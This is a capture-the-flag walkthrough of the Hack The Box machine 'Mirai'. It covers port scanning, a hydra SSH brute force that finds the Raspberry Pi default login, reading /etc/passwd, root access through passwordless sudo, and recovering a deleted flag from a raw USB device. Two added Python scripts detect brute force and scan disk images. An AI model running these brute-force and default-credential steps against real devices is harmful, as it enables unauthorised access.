Hack The Box : Mirai
22 August, 2021
Beginning with an nmap scan
---------------------Starting Port Scan-----------------------
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
---------------------Starting Script Scan-----------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
---------------------Starting Full Scan------------------------
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1779/tcp open pharmasoft
32400/tcp open plex
32469/tcp open unknown
Making a script scan on extra ports: 1779, 32400, 32469
PORT STATE SERVICE VERSION
1779/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-favicon: Plex
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Let's see what port 80 has to offer
$ curl -v 10.10.10.48
* Trying 10.10.10.48:80...
* Connected to 10.10.10.48 (10.10.10.48) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.48
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 404 Not Found
< X-Pi-hole: A black hole for Internet advertisements.
< Content-type: text/html; charset=UTF-8
< Content-Length: 0
< Date: Sat, 21 Aug 2021 11:49:13 GMT
< Server: lighttpd/1.4.35
<
* Connection #0 to host 10.10.10.48 left intact
Notice the response header X-Pi-hole. Having used Pi-hole before, I checked the path /admin/ and found that this Pi-hole was version 3.1.4. With no public exploits available for that version, and nothing of use on the Plex port either, I decided to brute force credentials, beginning with SSH.
$ hydra -L ssh-betterdefaultusers.txt -P ssh-betterdefaultpassword.txt 10.10.10.48 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-22 02:57:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 17424 login tries (l:132/p:132), ~1089 tries per task
[DATA] attacking ssh://10.10.10.48:22/
[STATUS] 162.00 tries/min, 162 tries in 00:01h, 17265 to do in 01:47h, 16 active
[STATUS] 113.00 tries/min, 339 tries in 00:03h, 17088 to do in 02:32h, 16 active
[STATUS] 126.57 tries/min, 886 tries in 00:07h, 16541 to do in 02:11h, 16 active
[STATUS] 120.80 tries/min, 1812 tries in 00:15h, 15615 to do in 02:10h, 16 active
[22][ssh] host: 10.10.10.48 login: pi password: raspberry
Well... these are the default login credentials of a Raspberry Pi.
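From the target's side, a run like this is loud in /var/log/auth.log. As an added example, not part of the original writeup, here is a small detector over constructed sshd log lines: it flags a source with many failed logins inside a sliding window and, the case that matters here, records a later successful login from that same source, which is what a guessed default password looks like. The log lines, the year 2021 (syslog timestamps carry none) and the thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

# Constructed sample in Debian's /var/log/auth.log format (not taken from the box).
SAMPLE_AUTH_LOG = """\
Aug 22 02:57:30 raspberrypi sshd[1201]: Failed password for invalid user admin from 10.10.14.5 port 51002 ssh2
Aug 22 02:57:31 raspberrypi sshd[1203]: Failed password for root from 10.10.14.5 port 51004 ssh2
Aug 22 02:57:31 raspberrypi sshd[1205]: Failed password for invalid user ubnt from 10.10.14.5 port 51006 ssh2
Aug 22 02:57:32 raspberrypi sshd[1207]: Failed password for pi from 10.10.14.5 port 51008 ssh2
Aug 22 02:57:33 raspberrypi sshd[1209]: Failed password for pi from 10.10.14.5 port 51010 ssh2
Aug 22 03:12:40 raspberrypi sshd[1450]: Accepted password for pi from 10.10.14.5 port 51310 ssh2
Aug 22 03:15:01 raspberrypi sshd[1460]: Accepted publickey for pi from 10.10.14.9 port 40022 ssh2
"""

def parse_line(line, year):
    """Return (timestamp, result, user, source_ip), or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, year=2021, threshold=5, window_s=600):
    """Map source IP -> alert for sources with >= threshold failures inside a
    window_s sliding window; accepted_as records a later success from that IP."""
    failures, tried, alerts = defaultdict(deque), defaultdict(set), {}
    for line in log_text.splitlines():
        rec = parse_line(line, year)
        if rec is None:
            continue
        ts, result, user, ip = rec
        q = failures[ip]                   # timestamps of recent failures
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()                    # slide the window forward
        if result == "Failed":
            q.append(ts)
            tried[ip].add(user)
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "users": tried[ip], "accepted_as": None})
                a["failures"] = max(a["failures"], len(q))
        elif ip in alerts:                 # success after a burst of failures
            alerts[ip]["accepted_as"] = user
    return alerts
```

The interesting alert is one with accepted_as set: a burst of failures followed by a password login from the same address deserves a look even when the account is a legitimate one like pi.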
ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:109::/var/run/dbus:/bin/false
avahi:x:105:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
ntp:x:106:111::/home/ntp:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:108:65534::/var/lib/nfs:/bin/false
pulse:x:109:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:110:116:RealtimeKit,,,:/proc:/bin/false
lightdm:x:111:119:Light Display Manager:/var/lib/lightdm:/bin/false
pi:x:1000:1000:,,,:/home/pi:/bin/bash
plex:x:112:120::/var/lib/plexmediaserver:/bin/bash
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/bin/false
pihole:x:999:997::/home/pihole:/usr/sbin/nologin
User
The user flag was accessible right away.
pi@raspberrypi:~ $ ls *
background.jpg
Desktop:
Plex user.txt
Documents:
BlueJ Projects Greenfoot Projects Scratch Projects
Downloads:
Music:
oldconffiles:
Pictures:
Public:
python_games:
4row_arrow.png badswap.wav catanimation.py fourinarow.py gem6.png Grass_Block.png inkspillspot.png match5.wav RedSelector.png Star.png tetrominoforidiots.py wormy.py
4row_black.png beep1.ogg catgirl.png gameicon.png gem7.png horngirl.png launcher.sh memorypuzzle_obfuscated.py Rock.png starPusherLevels.txt tetromino.py
4row_board.png beep2.ogg cat.png gem1.png gemgem.py inkspilllogo.png match0.wav memorypuzzle.py Selector.png starpusher.py Tree_Short.png
4row_computerwinner.png beep3.ogg drawing.py gem2.png grass1.png inkspill.py match1.wav pentomino.py simulate.py star_solved.png Tree_Tall.png
4row_humanwinner.png beep4.ogg flippybackground.png gem3.png grass2.png inkspillresetbutton.png match2.wav pinkgirl.png slidepuzzle.py star_title.png Tree_Ugly.png
4row_red.png blankpygame.py flippyboard.png gem4.png grass3.png inkspillsettingsbutton.png match3.wav Plain_Block.png squirrel.png tetrisb.mid Wall_Block_Tall.png
4row_tie.png boy.png flippy.py gem5.png grass4.png inkspillsettings.png match4.wav princess.png squirrel.py tetrisc.mid Wood_Block_Tall.png
Templates:
Videos:
pi@raspberrypi:~ $ cat Desktop/user.txt
<flag>
Root
Escalating privileges was really straightforward as well.
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
pi@raspberrypi:~ $ su su
No passwd entry for user 'su'
pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)
root@raspberrypi:/home/pi# whoami
root
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
I checked the attached volumes using df.
root@raspberrypi:~# df -h
Filesystem Size Used Avail Use% Mounted on
aufs 8.5G 2.8G 5.3G 34% /
tmpfs 100M 13M 88M 13% /run
/dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1
/dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs 250M 0 250M 0% /lib/live/mount/overlay
/dev/sda2 8.5G 2.8G 5.3G 34% /lib/live/mount/persistence/sda2
devtmpfs 10M 0 10M 0% /dev
tmpfs 250M 8.0K 250M 1% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 250M 0 250M 0% /sys/fs/cgroup
tmpfs 250M 8.0K 250M 1% /tmp
/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick
tmpfs 50M 0 50M 0% /run/user/999
tmpfs 50M 0 50M 0% /run/user/1000
Let's look at the USB stick.
root@raspberrypi:~# cd /media/usbstick/
root@raspberrypi:/media/usbstick# ls
damnit.txt lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
I started looking at ways to recover deleted files and came across this answer on StackExchange. I tried using debugfs, but the logdump didn't show anything. So then I tried grep on the raw device, and it worked: I saw the flag in a jumble of non-Unicode characters...
root@raspberrypi:/dev# grep -a -C 500 'a' /dev/sdb | tee /tmp/flag
...
�1�Y
�|}*,.�▒����+-���<flag>
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
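grep -a worked here because deleting a file on ext filesystems only removes the directory entry and frees the blocks; the bytes stay on the device until something overwrites them, so scanning the raw device for a known marker finds them. As an added example that is not from the writeup, the scanner below does the same search over a constructed stand-in image (the HTB{...} flag, the filler and the offsets are made up), reading the device in chunks so it also works on disks far larger than this 8.7M stick, never missing or duplicating a hit at a chunk boundary and reporting an exact byte offset per hit.

```python
import io
import sys

def scan_raw_device(fileobj, needle, context=32, chunk_size=1 << 20):
    """Scan a block device or image for `needle`; return [(offset, snippet)].

    Chunked read with the tail of each pass carried into the next, so a hit
    straddling a chunk boundary is neither missed nor reported twice and every
    snippet keeps `context` bytes on both sides (except at the device edges).
    """
    n = len(needle)
    if n == 0:
        raise ValueError("needle must be non-empty")
    hits, buf, base, pending, eof = [], b"", 0, 0, False
    # base: device offset of buf[0]; pending: first offset still to be searched
    while not eof:
        block = fileobj.read(chunk_size)
        eof = not block
        buf += block
        i = buf.find(needle, pending - base)
        while i != -1:
            if i + n + context > len(buf) and not eof:
                pending = base + i      # trailing context not read yet:
                break                   # re-examine this hit on the next pass
            hits.append((base + i, buf[max(0, i - context):i + n + context]))
            i = buf.find(needle, i + 1)
        else:   # nothing deferred: only a partial needle can hide in the tail
            pending = max(pending, base + max(0, len(buf) - (n - 1)))
        keep = max(0, pending - base - context)   # retain leading context bytes
        buf, base = buf[keep:], base + keep
    return hits

def scan_bytes(data, needle, context=32, chunk_size=1 << 20):
    """Same scan over an in-memory image."""
    return scan_raw_device(io.BytesIO(data), needle, context, chunk_size)

def build_sample_image():
    """Constructed stand-in for /dev/sdb (not real data from the box): filler
    blocks with the contents of a deleted file still sitting in unallocated space."""
    filler = bytes(range(256)) * 4      # 1024 bytes that never contain our markers
    deleted = b"root flag backup\nHTB{constructed_flag_for_the_example}\n"
    note = b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    return filler[:1000] + deleted + filler + note + filler

if __name__ == "__main__":   # python scan.py [device-or-image] [marker]
    needle = sys.argv[2].encode() if len(sys.argv) > 2 else b"HTB{"
    src = open(sys.argv[1], "rb") if len(sys.argv) > 1 else io.BytesIO(build_sample_image())
    with src:
        for off, snip in scan_raw_device(src, needle, context=64):
            print(f"offset {off:#x}: {snip!r}")
```

Run without arguments it scans the built-in sample; given a path and a marker it reads an image or device and never writes to it, which is the property you want when the goal is recovering, not further damaging, the data.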